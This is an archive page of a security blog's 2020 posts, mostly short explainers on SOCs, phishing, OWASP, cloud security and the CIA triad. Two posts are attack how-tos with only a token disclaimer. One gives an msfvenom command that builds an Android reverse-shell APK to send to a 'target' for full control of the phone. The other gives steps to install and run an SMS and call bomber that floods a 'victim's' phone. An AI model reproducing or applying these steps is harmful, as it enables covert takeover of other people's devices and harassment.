Posts

Showing posts from 2020

SOC: Security Operations Center

A Security Operations Center (SOC) is a centralized unit that deals with security issues on an organizational and technical level. This is the definition of SOC. But wait, did you get it? Let's simplify it. You all know what a "Hub" is... (You are reading a blog post on InfoSec Hub 🙇) A SOC acts like the hub. It continuously monitors the organization's security posture while preventing, detecting, analyzing and responding to cybersecurity incidents. Main Work Done By SOC: SOC monitors and analyzes activity on networks, servers, endpoints, databases, applications and so on. Establishing SOC: The first step in establishing an organization's SOC is to clearly define a strategy that incorporates business-specific goals from various departments as well as input and support from executives. In addition, infrastructure is required to support the strategy that is going to be implemented. Benefits Of SOC: Improvement in security incident detection. Advantage for companies to defen

How to create a payload and access Android?

Try at your own risk. Only for educational purposes. First let us get the basics clear... What is a payload? In computer networking and telecommunications, when a transmission unit is sent from the source to the destination, it contains both a header and the actual data to be transmitted. This actual data is called the payload. What will we do? We will access the Android device by creating a payload. What will we get? We will get full control of the Android device, e.g. camera snapshots, call logs, contact logs, apps installed on the phone, system info, etc. How will we do this? With the help of Metasploit we will create an APK file, i.e. the payload. Then we will send this APK file to the target device. After the file is installed on the target device, we will get full control of the device. Let's start... We will use Kali Linux for this purpose. First create a payload: root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk

T Bomb: SMS and Call Bomber! Hangs Your Smartphone!

Discovering a tool which has the capability to hang your smartphone! T Bomb is an open source call and SMS bomber for Linux and Termux. T Bomb can send unlimited SMS and calls to the victim's phone so that the phone hangs. Installation: Step 1. Type command pkg install git Step 2. pkg install python Step 3. git clone https://github.com/TheSpeedX/TBomb.git Step 4. cd TBomb Step 5. chmod +x TBomb.sh Now run the tool: Step 6. cd TBomb Step 7. ./TBomb.sh And Boom!!! Now proceed as instructed. Press Enter. Press 1 for SMS bomber. Press 2 for Call bomber. Press 3 to update (works on Linux and Linux emulators). Press 4 to view features. Press 5 to exit. Important: Only for educational purposes. We are not responsible if any kind of misuse of this tool is identified.

Jio-Google Brings 5G Revolution In India!

Today the world is facing the Corona pandemic. This resulted in a global lockdown, leading to world-wide unemployment. Millions of people lost their jobs. But there are some exceptions. Many companies big and small experienced great losses in their businesses. Some even went bankrupt. But on the other hand there are some companies that found a way and reached new heights. And Reliance Jio is one of them. Reliance Jio already brought a revolution to the telecom industry by launching Jio in 2016 and providing free / cheap mobile data. Now Jio has made various contracts with companies such as Facebook, Qualcomm, Intel and now the tech giant Google. This made Mukesh Ambani the 6th richest person in the world. He overtook Larry Page in the list. In the 43rd RIL AGM, Google declared it would invest Rs. 33737 crores for a 7.7% stake. Jio made a binding partnership and investment agreement with Google. After Google's investment, a total of 14 companies have now invested in Jio. Vario

Phishing: A sweet poison!

Phishing is a fraudulent attempt to obtain sensitive information such as passwords, usernames and credit card details by disguising oneself as a trustworthy entity in an electronic communication. This is how phishing is defined. Got it? No? That's ok. You will get it by the end of this blog. Hackers are creative and they should be! One such famous hacking technique, or a way to gain information about a target user, is called phishing. Phishing is a method to gather personal information using mainly deceptive emails and websites. The goal is to make the target believe that the message, mail or website is something important for him, for example a bank request or a donation, and to force him to click the link. It is one of the oldest types of cyberattacks, dating back to the 1990s, and still one of the most popular attacks among hackers. How did phishing get its name? Yes, you guessed it right. Phishing is similar to the word fishing. The letter "f" is replaced by "p". As in fishing, the fis

OWASP Top 10 vulnerabilities

What is OWASP? OWASP, which stands for Open Web Application Security Project, is an international non-profit organization dedicated to web application security. It produces various articles, methodologies, tools and technologies in the field of web application security. It was established in 2001 with the goal of protecting web applications from cyber attacks. What is OWASP Top 10? OWASP Top 10 prioritizes the most common web security risks affecting web applications. The point to consider here is that there are more than 10 security risks but only the top 10 are included. There are four criteria used for making this list. They are: ease of exploitability, prevalence, detectability and business impact. The list was first published in the year 2003. It was then updated in the years 2004, 2007, 2010, 2013 and 2017. Top 10 Vulnerabilities: 1. Injection: An injection vulnerability allows attackers to send unfriendly, hostile data to an interpreter, causing the data to be compiled and executed on the server. If your app

Cloud Security Explained

As we know, the cloud is nothing but a server which we (companies) take on rent to host websites, apps and other such data. Security is essential in cloud computing. Cloud security consists of a set of policies, controls and technologies that work together in unison to protect cloud-based systems. Cloud security is the protection of data from leakage, deletion, data breaches, session hijacking, insecure APIs, etc. that can compromise cloud security. Cloud data security becomes important as we move our data centres and business processes to the cloud. Benefits of Cloud Security - Centralized security - As the cloud centralizes applications and data, cloud security centralizes protection. Managing the entities centrally enhances traffic analysis and web filtering. Reduced cost - The big advantage of using cloud storage and security is that it eliminates the need for dedicated hardware. Cloud offers 24/7 proactive security. Reliability - Cloud is very dependable. Users can safely acce

'Namaste' to replace unsafe Zoom

As the coronavirus spread across the globe, many countries imposed lockdowns. This led many companies (especially in the IT field) to implement 'work from home'. Due to work from home, meetings were organised virtually. Various applications were used for video conferencing. And the list was topped by Zoom, a company headquartered in San Jose, California. Downloads of the Zoom app increased dramatically by 1270%, that is over 12 times, from 22nd of February to 22nd of March. As a result Zoom's stock price hit an all-time high in mid March. The coronavirus turned out to be a boon for Zoom. But then Joe Cox, writing for Vice Motherboard, reported on March 26, 2020 that the Zoom iOS app sends data to Facebook, even if you don't have a Facebook account. Then Micah Lee and Yael Grauer, writing for The Intercept, reported on March 31, 2020 that Zoom meetings aren't end-to-end encrypted, despite misleading marketing. People

Phishing attack on PMCares Fund!

Today the world is experiencing a very tense situation due to COVID-19. Due to the coronavirus pandemic almost all countries in the world are under economic slowdown. This includes major countries like America, France, India, Italy, and many others. India is moving towards becoming a 5 trillion $ economy by 2024 but the coronavirus is acting like a huge wall between the target and the Indian economy. As this is a pandemic, major decisions have been taken by the Indian government to stop the spread of the virus. These include a 21-day lockdown and social distancing. But due to the lockdown the Indian economy is suffering. To deal with this situation, Prime Minister Narendra Modi established a fundraising campaign named PMCares Fund to gather donations from citizens. But unfortunately hackers have their eye on the site. Taking advantage of the severe situation.... Hackers always try to take advantage of the loopholes in everything. They know what situation the world is underg

Cyber security in Banking Sector

Gone are the days when people used to stand in a line to withdraw or deposit their money in banks. Now within a few clicks you can do any transaction or any bank-related work, even on your smartphone. But as a coin has two sides, so does technology. The banking sector has been under threat since its existence. Earlier there were physical, actual thieves who would rob the bank, but now there is no need for any physical harm. Now hackers enter the bank's network, hack into the system and collect customers' personal information. So cybersecurity is very important in banks. The main agenda of having cyber security in banks is protecting customers' vital personal information such as account numbers, transaction details, etc. Nowadays all the work of a bank is done on computers. Almost all banks today have their own app which customers use for transactions. The customers can easily access all the services provided by the bank within seconds. If in any case their account is hac

The CIA Triad

The CIA triad of Confidentiality, Integrity and Availability is at the core of information security. Information security professionals who create policies and procedures must consider each goal when creating a plan to protect computer systems. Confidentiality: In information security, confidentiality is the property that information is not made available or disclosed to unauthorized individuals, entities or processes. Confidentiality is the component of privacy that protects our data from unauthorized viewers. Confidentiality involves a set of rules or a promise, usually executed through confidentiality agreements, that limits access or places restrictions on certain types of information. Attacks that affect Confidentiality: password cracking, packet sniffing, wiretapping, keylogging, dumpster diving, phishing. Integrity: In InfoSec, data integrity means maintaining and assuring the accuracy and completeness of da

Coronavirus and Cyber security

Hackers always try to search for different ways to hack websites. The coronavirus pandemic is spreading day by day. Hackers are taking advantage of this situation as an environment of fear has spread all over the world. The number of malicious emails mentioning the coronavirus has increased significantly since the end of January. They are forging emails mentioning the outbreak that unleash malware when the messages are opened. Various phishing mails are created asking for donations for the treatment of virus-affected people. In one such phishing mail, hackers created a mail in the name of the WHO, i.e. World Health Organization. In that mail they created a donation form in the name of the WHO. The user fills in debit card details and eventually the money is transferred to the hacker's account. There are also various other cases of cyber attacks discovered. In one such case, Android users are using an app called CovidLock to track the coronavirus. The app i

28th January : Data Privacy Day

Data is today's currency. We are surrounded by data 24 by 7. Data Privacy Day occurs on 28th of January every year. This day is primarily observed in the United States, European Union, Canada and Israel and 47 European countries but is also spreading to other parts of the world as privacy concerns grow day by day. What is the need to observe this day? There's no doubt how important privacy is, but we somehow become unconcerned about the loss of privacy of our data. A decade ago no one would have predicted how companies would end up basing their entire business model on user data, but now gradual changes are seen in companies' privacy policies, which is a good thing. Spread: Data Privacy Day initially began as an educational event to increase awareness among businesses to protect user privacy and user data. The educational focus has expanded over the years to include families and consumers. The international celebration offers many opportuni

Kali Linux: Hacker's Paradise!!!

"THE QUIETER YOU BECOME, THE MORE YOU ARE ABLE TO HEAR" This is not a motivational quote from a book but the tagline of the most famous OS used in the security field, Kali Linux, which was formerly called BackTrack OS. Kali Linux is a Debian-based Linux distribution aimed at advanced penetration testing and security auditing. Kali contains several hundred tools which are geared towards various information security tasks such as penetration testing, security research, computer forensics and reverse engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company. Now the main thing to notice is that using Kali Linux, that is, using the tools preinstalled in Kali, will not make you a hacker. Kali Linux is yet another Linux distribution based on Debian. Kali Linux is not for hacking and cracking or stealing someone's data or a Facebook passw